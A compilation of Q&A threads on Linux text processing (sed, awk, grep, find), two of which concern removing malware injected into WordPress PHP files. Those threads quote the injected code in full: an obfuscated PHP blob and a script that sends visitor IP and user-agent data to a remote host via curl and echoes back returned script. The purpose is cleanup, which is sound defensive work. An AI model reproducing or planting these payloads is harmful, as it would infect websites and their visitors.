Replacing large string of text in Linux - linux

I have several thousand WP files that were injected with a string like the sample below.
I know I can do a replace with something like this:
find . -type f -exec sed -i 's/foo/bar/g' {} +
But I am having a problem getting the large string to be taken correctly. All the " and ' cause the string to jump out of my CLI.
Below is a sample string:
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\1162]y4c##j0#67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1pde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5cujojRk3%x5c%x7860{666~7878Bsfuvso!sboepn)%x5c%x7825epnbss-x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%xp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uc%x7825Z<#opo#>b%x5c%x7<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x70QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x!Ydrr)%x5c%x7825r%x5c%x%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x560msvd}+;!>!}%x5c%x7827;!>tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2e:4e, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>
EXAMPLE of what I tried:
perl -pi -e 's/<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $rlapmcvfunction fjfgg($n){%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782c%x7824*!|!%x5c%x7824-...x2a\57\x20"; $qenzappyva=substr($rlapmcvoxs,(48535-38422),(59-47)); $qenzappyva($rrzeotjace, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>//g' /home/......../content-grid.php
-bash: !: event not found

If the injected text is identical everywhere and sits on a line of its own, you can use comm:
comm -23 source subtract
where subtract is the file with the contents to be removed from the source file. comm expects both files to be sorted, and it does not edit in place, so write the output to a temp file and overwrite the source only after making sure it does what you need.
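Because comm needs sorted input, sorting a PHP file first would scramble it. A minimal sketch of an order-preserving alternative uses grep with fixed-string, whole-line matching instead of comm. This is a swapped-in technique, and the function name remove_exact_lines is made up for illustration:

```shell
# remove_exact_lines SOURCE SUBTRACT
# Prints SOURCE without any line that exactly equals a line of SUBTRACT.
# Caveat: an empty line in SUBTRACT also removes every empty line of SOURCE.
remove_exact_lines() {
    # -F: patterns are fixed strings, not regular expressions
    # -x: a pattern must match the whole line
    # -v: print the lines that do NOT match
    # -f: read the patterns from the file given next
    grep -vxFf "$2" -- "$1"
}
```

As with comm, the result goes to standard output, so redirect it to a temp file and replace the source only after checking it.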

If you don't care about the extra newline, the simple approach using sed would be:
find . -type f -exec sed -i 's/.*\\x61\\156\\x75\\156\\x61.*$//g' {} +
sed can also handle the newline, but that is a little more complex.
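The quoting trouble in the question can be avoided by never typing the string on the command line at all. The sketch below assumes the injected string has been saved, exactly as it appears, as the first line of a file (called pattern.txt here, a hypothetical name) and that it fits on one line. awk's index() does a plain substring search, so quotes, $, ! and backslashes need no escaping. The function name remove_literal is made up for illustration.

```shell
# remove_literal FILE PATTERN_FILE
# Deletes every occurrence of the first line of PATTERN_FILE from FILE,
# treating it as plain text rather than as a regular expression.
remove_literal() {
    target=$1
    pattern_file=$2
    tmp=$(mktemp) || return 1
    awk -v pf="$pattern_file" '
        BEGIN {
            # Read the literal string from the file; give up if it is missing or empty.
            if ((getline pat < pf) <= 0 || pat == "") exit 2
        }
        {
            # Cut out each occurrence of the literal string from the current line.
            while ((i = index($0, pat)) > 0)
                $0 = substr($0, 1, i - 1) substr($0, i + length(pat))
            print
        }
    ' "$target" > "$tmp" && cat "$tmp" > "$target"
    status=$?
    rm -f "$tmp"
    return "$status"
}
```

Unlike the sed command above, this removes only the injected string and leaves the rest of the line in place, which matters when legitimate code follows the injection on the same line. Try it on a copy of one file before running it over the whole tree.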

Related

sed- insert text before and after pattern

As a part of optimisation, I am trying to replace, in all Java files, every statement of the form:
logger.trace("some trace message");
With:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
N.B. Some trace message is not the exact string but an example. This string will be different for every instance.
I am using a bash script and sed but can't quite get the command right.
I have tried this in a bash script to insert before:
traceStmt="if (logger.isTraceEnabled())
{
"
find . -type f -name '*.java' | xargs sed "s?\(logger\.trace\)\(.*\)?\1${traceStmt}?g"
I have also tried different variants but with no success.
Try the following using GNU sed:
$ cat file1.java
1
2
logger.trace("some trace message");
4
5
$ find . -type f -name '*.java' | xargs sed 's?\(logger\.trace\)\(.*\)?if (logger.isTraceEnabled())\n{\n \1\2\n}?'
1
2
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
4
5
$
If you would like to avoid adding a trailing newline (sed appends \n to files that do not end in one), you could try Perl instead:
perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' file.java
Notice the trailing /e. The evaluation modifier s///e wraps an eval{...} around the replacement string, and the evaluated result is substituted for the matched substring. Here the replacement is `cat input`, so the match is replaced by the contents of the file input, which for your example contains:
if (logger.isTraceEnabled())
{
logger.trace("some trace message");
}
If you have multiple files, you could try:
find . -type f -name '*.java' -exec perl -pi -e 's/logger.trace\("some trace message"\);/`cat input`/e' {} +
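Since the trace message differs for every instance, a fixed replacement text will not cover all of them. Here is a minimal sketch that captures whatever statement is there and reuses its indentation. It assumes GNU sed (for \n in the replacement) and that each logger.trace(...); statement sits on a single line. The function name wrap_trace is made up for illustration.

```shell
# wrap_trace FILE...
# Prints each file with every single-line logger.trace(...); statement wrapped
# in an isTraceEnabled() guard, reusing the statement's own indentation.
wrap_trace() {
    # \1 = leading whitespace, \2 = the original trace statement
    sed -E 's/^([[:space:]]*)(logger\.trace\(.*\);)[[:space:]]*$/\1if (logger.isTraceEnabled())\n\1{\n\1    \2\n\1}/' "$@"
}
```

The function only prints the result. Running it a second time on already wrapped code would wrap the statement again, so apply it once and review the output before writing it back.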

Removing a prefix from files recursively in ssh

I have a load of folders of images (a lot!) and some of the thumbnails have a 'tn' prefix, while others don't, so in order to be able to write a gallery for all, I'm trying to remove the 'tn' from the beginning of the files that have it recursively in the entire directory.
So, an offending thumbnail would have the files :
tngal001-001.jpg
tngal001-002.jpg
tngal001-003.jpg
etc...
and I need them to be :
gal001-001.jpg
gal001-002.jpg
gal001-003.jpg
or even better still... if I could get the whole tngal001- off, that'd be amazing, so, in the directory gallery I have:
gal001/thumbnails/tngal001-001.jpg
gal001/thumbnails/tngal001-002.jpg
gal001/thumbnails/tngal001-003.jpg
etc...
gal002/thumbnails/tngal002-001.jpg
gal002/thumbnails/tngal002-002.jpg
gal002/thumbnails/tngal002-003.jpg
etc...
gal003/thumbnails/tngal003-001.jpg
gal003/thumbnails/tngal003-002.jpg
gal003/thumbnails/tngal003-003.jpg
etc...
and I'd prefer to have:
gal001/thumbnails/001.jpg
gal001/thumbnails/002.jpg
gal001/thumbnails/003.jpg
etc...
gal002/thumbnails/001.jpg
gal002/thumbnails/002.jpg
gal002/thumbnails/003.jpg
etc...
gal003/thumbnails/001.jpg
gal003/thumbnails/002.jpg
gal003/thumbnails/003.jpg
etc...
I have tried find . -type f -name "tn*" -exec sh -c 'for f; do mv "$f" "{f#tn}"; done' find sh {} +
and find . -type f -exec sh -c 'for file in tn*; do mv "$file" "${file#tn}"; done' findsh {} +
but I'm not getting it quite right. I just want to understand how to strip off the letters/rename recursively, as I'm just getting my head around this stuff. All the other questions I have found seem to be talking about stripping out characters from file names and all the ascii characters and escaping spaces etc are confusing me. I would appreciate it if someone could explain it in plain(ish) english. I'm not stupid, but I am a newbie to linux! I know it's all logical once I understand what's happening.
Thanks in advance, Kirsty
find . -type f -name "tn*" -exec sh -c '
for f; do
fname=${f##*/}
mv -i -- "$f" "${f%/*}/${fname#tn*-}"
done
' sh {} +
You need to split "$f" into the parent path and filename before you start to remove the prefix from the filename. And you forgot to add a $ in your parameter expansion (${f#tn}).
${f##*/} removes the longest prefix */ and leaves the filename, e.g.
gal001/thumbnails/tngal001-001.jpg -> tngal001-001.jpg
(the same result as basename "$f")
${f%/*} removes the shortest suffix /* and leaves the parent path, e.g.
gal001/thumbnails/tngal001-001.jpg -> gal001/thumbnails
(the same result as dirname "$f")
${fname#tn*-} removes the shortest prefix tn*- from the filename, e.g.
tngal001-001.jpg -> 001.jpg
I added the -i option to prompt to overwrite an already existing file.
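To see the three expansions work without renaming anything, here is a small sketch that only prints the new path. The function name strip_thumb_prefix is made up for illustration.

```shell
# strip_thumb_prefix PATH
# Prints the path that the loop above would rename PATH to.
strip_thumb_prefix() {
    f=$1
    fname=${f##*/}   # file name only:   tngal001-001.jpg
    dir=${f%/*}      # parent path only: gal001/thumbnails
    # Remove the shortest leading "tn...-" from the file name and re-attach the path.
    printf '%s\n' "$dir/${fname#tn*-}"
}

strip_thumb_prefix gal001/thumbnails/tngal001-001.jpg   # prints gal001/thumbnails/001.jpg
```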
You can loop over all the folders and files in your gallery and then rename them as follows.
Assuming you have your folder structure as
gallery/
gallery/gal001
gallery/gal002
gallery/gal003
...
gallery/gal001/thumbnails/
gallery/gal002/thumbnails/
gallery/gal003/thumbnails/
...
gallery/gal001/thumbnails/tngal001-001.jpg
gallery/gal001/thumbnails/tngal001-002.jpg
gallery/gal001/thumbnails/tngal001-003.jpg
Move to your gallery using cd gallery then run the following code
for j in *;
do
cd "$j/thumbnails" || continue;
for i in *;
do
echo "Renaming $j/thumbnails/$i --> $(echo "$i"|sed "s/tn$j-//1")";
mv -i "$i" "$(echo "$i"|sed "s/tn$j-//1")";
done
cd ../..;
done
Explanation
for j in *;
loops over everything in gallery, i.e. j takes the values gal001, gal002, gal003, etc.
cd "$j/thumbnails" || continue;
moves into the gal001/thumbnails directory, and skips to the next entry if that directory does not exist.
for i in *; do
loops over all the files in the directory gal001/thumbnails; the name of the current file is held in i.
echo "Renaming $j/thumbnails/$i --> $(echo "$i"|sed "s/tn$j-//1")"
prints the file name and the name it is being renamed to. (Remove it if you don't want verbose output.)
mv -i "$i" "$(echo "$i"|sed "s/tn$j-//1")"; done
mv -i "$i" newname renames $i (the current file in the loop). The -i flag prompts before overwriting if the new name already exists.
sed is the stream editor; it receives the file name through the pipe from echo "$i".
"s/previous/new/1" replaces the first occurrence of previous with new in the stream. Here it replaces tn + j (j being the directory name, e.g. gal001), i.e. tngal001-, with the empty string (nothing between //).
cd ../.. moves back to gallery.

Searching multiple files for list of words in a text file

I need to go through a huge amount of text files and list the ones that contains ALL of the words listed in another text file.
I need to list only the files containing all of the words. It does not have to be in any specific order. I've tried to use a variety of grep commands, but it only outputs the files containing any of the words, not all of them. It would be ideal to use the txt file containing the list of words as a search for grep.
Expected output is a list of just the files that succeed in the search (files that contains all the words from the "query" text file)
Tried
grep -Ffw word_list.txt /*.fas
find . -exec grep "word_list.txt" '{}' \; -print
I've found solutions using a number of pipes like
awk "/word1/&&/word2/&&/word3/" ./*.txt
find . -path '*.txt' -prune -o -type f -exec gawk '/word1/{a=1}/word2/{b=1}/word3/{c=1}END{ if (a && b && c) print FILENAME }' {} \;
But I have a huge list of words and would be impractical.
Thank you.
Given sample files
file1.txt
word1
word2
word4
word5
file2.txt
word1
word2
word3
word4
file3.txt
word2
word3
word4
file4.txt
word0
word1
word2
word3
word4
file5.txt
word0
word1
word2
word3
word4
word5
This old-fashioned awk/shell code
#!/bin/bash
wordList="$1"
shift
awk -v wdListFile="$wordList" '
BEGIN{
dbg=0
while(getline < wdListFile > 0 ) {
words[$0]=$0
flags[$0]=0
numFlags++
}
}
{
if (dbg) { print "#dbg: myFile=" myFile " FILENAME=" FILENAME }
if (myFile != FILENAME) {
# a minor cost of extra reset on the first iteration in the run
if (dbg) { print "#dbg: inside flags reset" }
for (flg in flags) {
flags[flg]=0
}
}
for (i=1; i<=NF; i++) {
if (dbg) { print "#dbg: $i="$i }
if ($i in words) {
flags[$i]++
}
}
matchedCnt=0
for (f in flags) {
if (dbg) { print "#dbg: flags["f"]="flags[f] }
if (flags[f] > 0 ) {
matchedCnt++
if (dbg) { print "#dbg: incremented matchedCnt to " matchedCnt}
}
}
if (dbg) {print "#dbg: Testing matchedCnt=" matchedCnt "==numFlags=" numFlags}
if (matchedCnt == numFlags) {
if (dbg) { print "All words found in " FILENAME " matchedCnt=" matchedCnt " numFlags=" numFlags}
print FILENAME
nextfile
}
myFile=FILENAME
if (dbg) { print "#dbg: myFile NOW=" myFile }
}' "$@"
Run from the command line as
./genGrep.sh wd.lst file*.txt
Produces the following output
file2.txt
file4.txt
file5.txt
One time only, make the script executable with
chmod 755 ./genGrep.sh
I would recommend making a copy of this file with dbg in the name, then take the original copy and delete all lines with dbg. This way you'll have a dbg version if you need it, but the dbg lines add an extra ~20% to reading the code.
Note that you can switch all dbging on by setting dbg=1 OR you can turn on individual lines by adding a ! char, i.e. if (! dbg) { ...}.
If for some reason you're running on a really old Unix system, the nextfile command may not work. See if your system has gawk available, or get it installed.
I think there is a trick to getting nextfile behavior if it's not built in, but I don't want to spend time researching that now.
Note that the use of the flags[] array, matchedCnt variable and the builtin awk function nextfile is designed to stop searching in a file once all words have been found.
You could also add a parameter to say "if n percent match, then print file name", but that comes with a consulting rate attached.
If you don't understand the stripped-down awk code (with the dbg sections removed), please work your way through Grymoire's Awk Tutorial before asking questions.
Managing thousands of files (as you indicate) is a separate problem. But to get things going, I would call genGrep.sh wd.lst A* ; genGrep.sh wd.lst B*; ... and hope that works. The problem is that the command line has a limit on the number of chars that can be processed at once in filename lists. So if A* expands to 1 billion chars, then you have to find a way to break the list up into pieces that the shell can process.
Typically, this is solved with xargs, so
find /path/to/files -name 'file*.txt' | xargs ./genGrep.sh wd.lst
will find all the files that match the wildcard, as demonstrated, under the one or more /path/to/files directories that you list as the first arguments to find.
All matching files are sent through the pipe to xargs, which passes as many file names as one command invocation can take, and continues looping (not visible to you) until all files have been processed.
There are extra options to xargs that allow running multiple copies of ./genGrep.sh at once, if you have the extra "cores" available on your computer. I don't want to get too deep into that, as I don't know if the rest of this is really going to work in your real-world use.
IHTH
This is a bit of a hack, as there is no direct way to do AND in grep. We can simulate AND by chaining grep -l through xargs, so that each grep searches only the files that passed the previous one.
grep -l -E "word1" *.txt | xargs grep -l -E "word2" | xargs grep -l -E "word3" | xargs grep -l -E "word4"
-l => --files-with-matches (print only the file name)
-E => --extended-regexp
xargs => passes the file names printed by the previous grep as arguments to the next one.
Try something like:
WORD_LIST=file_with_words.txt
FILES_LIST=file_with_files_to_search.txt
RESULT=file_with_files_containing_all_words.txt
# Generate a list of files to search and store as provisional result
# You can use find, ls, or any other way you find useful
# (the three helper files are left out so they cannot match themselves)
find . -type f ! -name "${WORD_LIST}" ! -name "${FILES_LIST}" ! -name "${RESULT}" > "${RESULT}"
# Now perform the search for every word
for WORD in $(<"${WORD_LIST}"); do
# Remove any previous file list
rm -f "${FILES_LIST}"
# Set the provisional result as the new starting point
mv "${RESULT}" "${FILES_LIST}"
# Do a grep on this file list and keep only the files that
# contain this particular word (and all the previous ones)
cat "${FILES_LIST}" | xargs grep -l -- "${WORD}" > "${RESULT}"
done
# Clean up temporary files
rm -f "${FILES_LIST}"
At this point you should have in ${RESULT} the list of files that contain all the words in ${WORD_LIST}.
This operation is costly, as you have to read all the (still) candidate files again and again for every word you check, so try to put the less frequent words in the first place in the ${WORD_LIST} so you will drop as many files as possible from the checking as soon as possible.
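The same "every word must match" idea can be sketched as a shell function that stops checking a file at the first missing word. It assumes one word per line in the list file and uses grep -w for whole-word, fixed-string matching. The function name files_with_all_words is made up for illustration.

```shell
# files_with_all_words WORD_LIST FILE...
# Prints the name of each FILE that contains every word listed in WORD_LIST.
files_with_all_words() {
    word_list=$1
    shift
    for file in "$@"; do
        all_found=1
        while IFS= read -r word; do
            # Ignore blank lines in the word list.
            [ -n "$word" ] || continue
            # -q: quiet, -w: whole word, -F: fixed string (no regex)
            if ! grep -qwF -- "$word" "$file"; then
                all_found=0
                break
            fi
        done < "$word_list"
        if [ "$all_found" -eq 1 ]; then
            printf '%s\n' "$file"
        fi
    done
}
```

With the sample files from the awk answer and a list holding word1 through word4, calling files_with_all_words wd.lst file*.txt should name the same three files. It runs one grep per word per file, so it trades speed for simplicity.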

Find-and-replace multiple complex lines in Linux

I'm trying to clean up a security breach. I want to find all instances of the offending PHP code on the web directory and remove them. It looks like this:
<?php
#c9806e#
error_reporting(0); ini_set('display_errors',0); $wp_xoy23462 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_xoy23462) && !preg_match ('/bot/i', $wp_xoy23462))){
$wp_xoy0923462="http://"."template"."class".".com/class"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_xoy23462);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_xoy0923462);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_23462xoy = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_23462xoy,1,3) === 'scr' ){ echo $wp_23462xoy; }
#/c9806e#
?>
<?php
?>
(c9806e is a random alphanumeric string)
I've found lots of resources for using find, sed, and grep to replace simple things. I can probably cobble up something based on all that, but I would not be sure that it works, or that it won't break anything.
Here are the tools I have:
GNU Awk 3.1.7
GNU grep 2.6.3
GNU sed 4.2.1
GNU find 4.4.2
Here's the offending code with escaped characters.
<\?php
#\w+#
error_reporting\(0\); ini_set\('display_errors',0\); $wp_xoy23462 = @$_SERVER\['HTTP_USER_AGENT'\];
if \(\( preg_match \('/Gecko\|MSIE/i', $wp_xoy23462\) && !preg_match \('/bot/i', $wp_xoy23462\)\)\)\{
$wp_xoy0923462="http://"\."template"\."class"\."\.com/class"\."/\?ip="\.$_SERVER\['REMOTE_ADDR'\]\."&referer="\.urlencode\($_SERVER\['HTTP_HOST'\]\)\."&ua="\.urlencode\($wp_xoy23462\);
$ch = curl_init\(\); curl_setopt \($ch, CURLOPT_URL,$wp_xoy0923462\);
curl_setopt \($ch, CURLOPT_TIMEOUT, 6\); curl_setopt\($ch, CURLOPT_RETURNTRANSFER, 1\); $wp_23462xoy = curl_exec \($ch\); curl_close\($ch\);\}
if \( substr\($wp_23462xoy,1,3\) === 'scr' \)\{ echo $wp_23462xoy; \}
#/\w+#
\?>
<\?php
\?>
Edit: As it turned out, some of the linebreaks were \r\n instead of \n. (Others were just '\n'.)
sed -n '1! H;1 h
$ {x
: again
\|<?php\n#\([[:alnum:]]\{1,\}\)#\nerror_reporting(0).*#/\1#\n?>\n<\?php\n\n\?>| s///
t again
p
}'
A version that seems to work on GNU sed (thanks @leewangzhong):
sed -n '1! H;1 h
$ {x
: again
\|<?php\r*\n#\([[:alnum:]]\{6\}\)#\nerror_reporting(0).*#/\1#\r*\n?>\r*\n<?php\r*\n\r*\n?>| s///
t again
p
}'
Try something like this, though it really depends on the exact formatting of the injected code (\n, spaces, ...).
Concept:
Load the whole file into a buffer (sed works line by line by default) so that the pattern can contain \n.
1! H;1 h
stores the first line in the hold buffer (h) and appends every later line to it (H) as each line is read into the working buffer.
$ {x
On the last line ($), x swaps the hold buffer back into the working buffer, so sed is now working on the full file, including the \n between lines.
Search for and remove one block matching the pattern, starting with <?php and the #ID# header line.
If one was found, restart the operation (so with a new ID).
If none was found (so no more bad code), print the result (the cleaned code).
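The hold-buffer idiom is easier to follow on a toy input. This sketch uses the same 1!H;1h and ${x;...} skeleton, but with a trivial substitution that turns every embedded newline into a comma. The function name slurp_join is made up for illustration.

```shell
# Join all input lines with commas by collecting them in the hold space first.
slurp_join() {
    sed -n '
        1!H
        1h
        ${
            x
            s/\n/,/g
            p
        }
    '
}

printf 'a\nb\nc\n' | slurp_join   # prints a,b,c
```

The s/\n/,/g step can only work because, by the time it runs, the working buffer holds the whole input rather than a single line.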
Using Python instead of sed for the replacement.
The regex:
<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>
The regex with comments:
<\?php #Start of PHP code (escape the '?')
\s+ #Match any number of whitespace
#(\w+)#\s+ #Hax header: one or more alphanumeric
#symbols, and use parens to remember this group
error_reporting\(0\) #To be really sure that this isn't innocent code,
#we check for turning off error reporting.
[^#]+ #Match any character until the next #, including
#newlines.
#/\1#\s+ #Hax footer (using \1 to refer to the header code)
\?> #End of the PHP code
[^>]+> #Also catch the dummy <?php ?> that was added:
#match up to the next closing '>'
The Python script:
#Python 2.6
import os
import re
import sys

haxpattern = r"<\?php\s+#(\w+)#\s+error_reporting\(0\)[^#]+#/\1#\s+\?>[^>]+>"
haxre = re.compile(haxpattern)

#Takes in two file paths
#Prints from the infile to the outfile, with the hax removed
def unhax(input, output):
    with open(input) as infile:
        whole = infile.read() #read the entire file, yes
    match = haxre.search(whole)
    with open(output, 'w') as outfile:
        if not match: #not found: copy the file through unchanged
            outfile.write(whole)
            return None
        #output to file
        outfile.write(whole[:match.start()]) #before hax
        outfile.write(whole[match.end():]) #after hax
    #return the removed portion
    return match.group()

def process_and_backup(fname):
    backup = fname + '.bak2014'
    #move file to backup
    os.rename(fname, backup)
    try:
        #process
        print('-- %s --' % fname)
        print(unhax(input=backup, output=fname))
    except Exception:
        #failed, undo move
        os.rename(backup, fname)
        raise

def main():
    for arg in sys.argv[1:]:
        process_and_backup(arg)

if __name__ == '__main__':
    main()
The command:
find . -type f -name "*.php" -exec grep -l --null "wp_xoy0923462" {} \; | xargs -0 -I fname python unhaxphp.py fname >> unhax.out
The command, explained:
find #Find,
. #starting in the current folder,
-type f #files only (not directories)
-name "*.php" #which have names with extension .php
-exec grep #and execute grep on each file with these args:
-l #Print file names only (instead of matching lines)
--null #End prints with the NUL char instead of a newline
"wp_xoy0923462" #Look for this string
{} #in this file ("{}" being a placeholder for `find`)
\; #(End of the -exec command)
| #Use the output from above as the stdin for this program:
xargs #Read from stdin, and for each string that ends
-0 #with a NUL char (instead of whitespace)
-I fname #replace "fname" with that string (instead of making a list of args)
#in the following command:
python #Run the Python script
unhaxphp.py #with this filename, and pass as argument:
fname #the filename of the .php file to unhax
>> unhax.out #and append stdout to this file instead of the console

Find "string1" and delete between that and "string2"

I'm using command line and sed. I need a command to delete from multiple files recursively.
I have left comments such as:
<!--String 1 -->
Code to delete goes here
<!--String 2 -->
So I need to delete string 1, the text in between and string 2, in all files in the current directory and below.
Would appreciate any help :)
Just use addresses:
sed -e '/<!--String 1 -->/,/<!--String 2 -->/d'
Update: to apply the sed command recursively to files under a path, you can use find, adding -i so that sed edits each file in place instead of printing the result:
find /path/to/directory -type f -exec sed -i -e '/<!--String 1 -->/,/<!--String 2 -->/d' {} \;
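Since the deletion is applied to many files at once, a more cautious variant keeps a backup of every file it touches. The sketch below uses sed's -i.bak suffix form for this and skips existing .bak files so that a second run does not back up the backups. The function name strip_between is made up for illustration.

```shell
# strip_between DIR
# In every regular file under DIR, deletes the lines from "<!--String 1 -->"
# through "<!--String 2 -->" inclusive, keeping the original as FILE.bak.
# Caveat: if the closing marker is missing, sed deletes through the end of the file.
strip_between() {
    find "$1" -type f ! -name '*.bak' \
        -exec sed -i.bak -e '/<!--String 1 -->/,/<!--String 2 -->/d' {} +
}
```

Once the results have been checked, the backups can be removed with a separate find on '*.bak'.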
